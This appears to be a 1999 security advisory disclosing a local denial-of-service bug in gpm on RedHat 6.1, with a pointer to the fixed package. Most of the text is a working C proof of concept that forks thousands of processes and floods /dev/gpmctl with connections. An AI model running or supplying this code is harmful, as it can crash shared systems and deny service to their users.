COMMAND

    gpm

SYSTEMS AFFECTED

    Linux

PROBLEM

    Tomasz Grabowski  found following.   Some time  ago he  discovered
    some kind  of DoS  bug in  gpm shipped  with RedHat  6.1 (propably
    others).   Regular  user  can  simply  DoS  the gpm or (in several
    circumstances) the whole system.   In general the problem is  that
    /dev/gpmctl  uses  STREAM  and  You  can  flood it with many faked
    connections.

    If You want to play with it try attached code:

    // FuckGpm    CADENCE of Lam3rZ    1999.11.23
    
    #include <stdio.h>
    #include <unistd.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <sys/un.h>
    
    #define GDZIE    "/dev/gpmctl"
    #define POLACZENIA 200
    #define SHITY   10000
    
    
    int main (void)
    {
     int a,b;
     struct sockaddr_un sun;
    
     sun.sun_family = AF_UNIX;
     strncpy (sun.sun_path, GDZIE, 30);
     printf ("OK...\n");
    
     if (fork ())
      exit (0);
    
     for (b = 0; b < SHITY; b++)
      if (fork () == 0)
      break;
    
     for (b = 0; b < POLACZENIA; b++)
      {
       if ((a = socket (AF_UNIX, SOCK_STREAM, 0)) < 0)
        {
         perror ("socket");
         while (1);
       }
    
      if (connect (a, (struct sockaddr *) &sun, sizeof (struct sockaddr)) < 0)
       {
        perror ("connect");
        close (a);
        b--;
       }
      }
    
     while (1);
    }

SOLUTION

    RedHat announced  that the  bug is  *FIXED* now  and everyone  can
    download a new version of this package from redhat-rawhide:

        /pub/Linux/redhat-rawhide/i386/RedHat/RPMS/gpm-1.19.2-1.i386.rpm